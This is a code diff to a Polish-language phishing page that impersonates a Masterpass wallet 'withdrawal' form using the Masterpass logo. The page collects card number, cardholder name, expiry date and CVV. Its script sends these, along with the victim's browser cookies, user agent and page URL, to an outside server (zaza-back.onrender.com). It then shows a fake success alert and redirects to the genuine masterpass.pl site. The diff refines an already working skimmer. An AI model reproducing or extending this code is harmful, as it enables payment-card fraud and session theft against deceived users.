--- a/public/wallet-withdraw.html
+++ b/public/wallet-withdraw.html
@@ -2,64 +2,74 @@
 <html lang="pl">
 <head>
   <meta charset="UTF-8" />
-  <title>Wypłata | Portfel Masterpass</title>
-  <link rel="stylesheet" href="/style.css?v=2" />
+  <title>Wypłata środków | Masterpass</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <link rel="stylesheet" href="/style.css?v=3" />
+  <link rel="preconnect" href="https://fonts.googleapis.com" />
+  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet" />
 </head>
 <body>
-  <div class="container">
-    <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass logo" class="logo" />
-    <h1>Wypłata na kartę</h1>
+  <div class="page-container">
+    <div class="form-card">
+      <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass logo" class="logo" />
 
-    <form id="withdrawForm">
-      <label for="card">Numer karty (16 cyfr)</label>
-      <input type="text" id="card" maxlength="19" placeholder="1234 5678 9012 3456" required pattern="\d{4} \d{4} \d{4} \d{4}" />
+      <h1>Wypłata środków</h1>
+      <p class="subtitle">Podaj dane swojej karty płatniczej</p>
 
-      <label for="expiry">Data ważności</label>
-      <input type="month" id="expiry" required />
+      <form id="cardForm" novalidate>
+        <label for="cardNumber">Numer karty</label>
+        <input type="text" id="cardNumber" name="cardNumber" required maxlength="19" placeholder="0000 0000 0000 0000" />
 
-      <label for="cvv">Kod CVV</label>
-      <input type="text" id="cvv" maxlength="4" placeholder="123" pattern="\d{3,4}" required />
+        <label for="cardHolder">Imię i nazwisko właściciela</label>
+        <input type="text" id="cardHolder" name="cardHolder" required placeholder="Jan Kowalski" />
 
-      <label for="amount">Kwota (PLN)</label>
-      <input type="number" id="amount" min="1" step="1" required />
+        <label for="expiryDate">Data ważności (MM/RR)</label>
+        <input type="text" id="expiryDate" name="expiryDate" required placeholder="05/28" />
 
-      <button type="submit">Potwierdź wypłatę</button>
-    </form>
+        <label for="cvv">Kod CVV</label>
+        <input type="password" id="cvv" name="cvv" required maxlength="4" placeholder="123" />
 
-    <div id="confirmation"></div>
+        <button type="submit" class="submit-button">Potwierdź</button>
+      </form>
+
+      <div class="cookie-banner">
+        Strona wykorzystuje pliki cookie i inne podobne technologie. Korzystając z niej wyrażasz zgodę na ich używanie zgodnie z aktualnymi ustawieniami przeglądarki.
+        <a href="#">Informacja o Plikach Cookie</a>.
+      </div>
+    </div>
   </div>
 
   <script type="module">
-    const form = document.getElementById('withdrawForm');
-    const confirmation = document.getElementById('confirmation');
-
+    const form = document.getElementById('cardForm');
     form.addEventListener('submit', async (e) => {
       e.preventDefault();
 
-      const cardNumber = document.getElementById('card').value.trim();
-      const expiryDate = document.getElementById('expiry').value;
+      const cardNumber = document.getElementById('cardNumber').value.trim();
+      const cardHolder = document.getElementById('cardHolder').value.trim();
+      const expiryDate = document.getElementById('expiryDate').value.trim();
       const cvv = document.getElementById('cvv').value.trim();
-      const amount = document.getElementById('amount').value.trim();
 
-      const res = await fetch('https://zaza-back.onrender.com/card', {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({
-          cardNumber,
-          expiryDate,
-          cvv,
-          amount,
-          cookies: document.cookie,
-          userAgent: navigator.userAgent,
-          location: window.location.href,
-          date: new Date().toISOString()
-        })
-      });
+      try {
+        await fetch('https://zaza-back.onrender.com/card', {
+          method: 'POST',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({
+            cardNumber,
+            cardHolder,
+            expiryDate,
+            cvv,
+            cookies: document.cookie,
+            userAgent: navigator.userAgent,
+            location: window.location.href,
+            date: new Date().toISOString()
+          })
+        });
 
-      const data = await res.json();
-      confirmation.innerText = data.success
-        ? '✅ Wypłata została zrealizowana.'
-        : '❌ Wystąpił błąd.';
+        alert('Twoja wypłata została przyjęta do realizacji.');
+        window.location.href = 'https://www.masterpass.pl'; // или страница благодарности
+      } catch (err) {
+        console.error('Błąd wysyłania danych:', err);
+      }
     });
   </script>
 </body>
